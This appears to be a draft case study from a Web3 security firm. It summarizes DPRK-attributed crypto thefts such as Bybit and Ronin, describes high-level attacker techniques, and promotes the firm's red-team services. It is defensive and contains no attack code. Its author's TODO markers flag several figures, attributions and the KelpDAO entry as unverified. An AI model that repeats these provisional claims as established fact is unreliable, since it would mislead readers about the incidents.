All Case Studies
Red TeamingOperations Security

DPRK in Web3

Threat-intelligence analysis of recent DPRK-attributed attacks on Web3 protocols (Bybit, KelpDAO, and earlier Lazarus Group operations), and how CODESPECT red teaming addresses the techniques these incidents reveal.

The Problem

DPRK-affiliated threat actors — primarily Lazarus Group (APT38) and sub-clusters such as TraderTraitor — are now the most consequential state-sponsored threat in Web3. The FBI has publicly attributed multiple nine- and ten-figure crypto thefts to North Korean operations, and the pattern is accelerating: individual IT worker infiltration, high-volume spear-phishing of developers and executives, social engineering of signing operations, and post-compromise laundering across mixers and cross-chain bridges. TODO(author): add a short paragraph quantifying the scale (stolen value in 2024–2025, number of distinct incidents, estimated share of all crypto-theft losses) once numbers are sourced from Chainalysis / TRM / FBI statements.

Scope

This analysis covers publicly-reported DPRK-attributed incidents against Web3 infrastructure, not internal CODESPECT engagements. Each incident is referenced only as far as its attribution is public. Incidents analyzed: - **Bybit (February 2025).** Approximately $1.5B in ETH drained from a Safe multisig cold wallet. Publicly attributed by the FBI to DPRK-linked actors (TraderTraitor / Lazarus). Delivery vector was a compromised signing UI served to the signer. TODO(author): confirm the exact attack chain and cite FBI advisory. - **KelpDAO.** TODO(author): confirm the specific incident, its attribution, the vector, and the amount before publishing. Do not describe until verified. - **Ronin Bridge (March 2022).** Approximately $625M taken from the Ronin validator bridge. US Treasury OFAC sanctioned the receiving address and attributed the attack to Lazarus Group. TODO(author): confirm figure against OFAC advisory. - **Harmony Horizon Bridge (June 2022).** Approximately $100M taken from the Horizon bridge. TODO(author): confirm attribution source. - **Atomic Wallet (June 2023).** TODO(author): confirm attribution and amount. - **Additional 2024–2025 incidents.** TODO(author): list most recent DPRK-attributed incidents at time of publication (e.g. DMM Bitcoin, WazirX, Radiant Capital, etc., if still-accurate attribution).

Findings

Across these incidents, four recurring attacker techniques emerge. Each has direct implications for how Web3 teams should defend. **1. IT-worker infiltration.** DPRK operators apply for remote developer and contractor roles under fabricated identities, sometimes via legitimate freelance platforms. Once hired, they gain code-commit access, CI secrets, and privileged infrastructure. Bybit-style attacks begin months before the visible theft. **2. Targeted social engineering of signing operations.** Multiple recent thefts relied on compromising what a signer *saw* — not the key material itself. Attackers manipulated the signing UI, transaction preview, or approval workflow rather than breaking cryptography. This shifts the defensive priority from "secure the keys" to "verify the thing you are about to sign." **3. Supply-chain compromise.** DPRK groups have delivered implants through malicious npm packages, PyPI packages, and tampered build artifacts, with preferential targeting of Web3 developer tooling. **4. Post-compromise laundering.** Funds move through mixers, cross-chain bridges, and rapid stablecoin conversion. Speed of detection matters — the first 60 minutes are where recoverable value lives. TODO(author): expand each bullet with one concrete, citable example from the incidents above.

Outcome

CODESPECT red teaming and operations security engagements are scoped specifically against these DPRK techniques. - **DPRK screening** during hiring and contractor onboarding: structured identity verification, history-consistency checks, OSINT, and live video verification protocols that defeat pre-recorded deepfake interviews. - **Signing-operation red teaming:** simulated attacker-in-the-middle against Safe multisig workflows, hardware wallet UX review, and transaction-preview integrity testing — modeled directly on the Bybit-class attack chain. - **Supply-chain review** of developer toolchains, CI/CD secrets, and third-party dependencies, including the specific npm/PyPI package families DPRK groups have previously used. - **Phishing simulation** calibrated to observed DPRK TTPs — recruiter-impersonation, Zoom/Signal-installer decoys, malicious NFT-metadata, and targeted Telegram approaches. - **Incident-response readiness** with SEAL 911 integration, so that first-hour response is a rehearsed playbook rather than an improvisation. TODO(author): if and when CODESPECT publishes anonymized statistics from its own red team engagements (e.g. "X screenings performed, Y DPRK-linked candidates flagged"), add them here. Do not fabricate.

Ready to Secure Your Project?

Get a free 30-minute security assessment. We will review your codebase scope and flag the top 3 risk areas.

No commitment required. Typical audits start within 1–2 weeks.

Get Free Pre-Assessmentaudits@codespect.xyz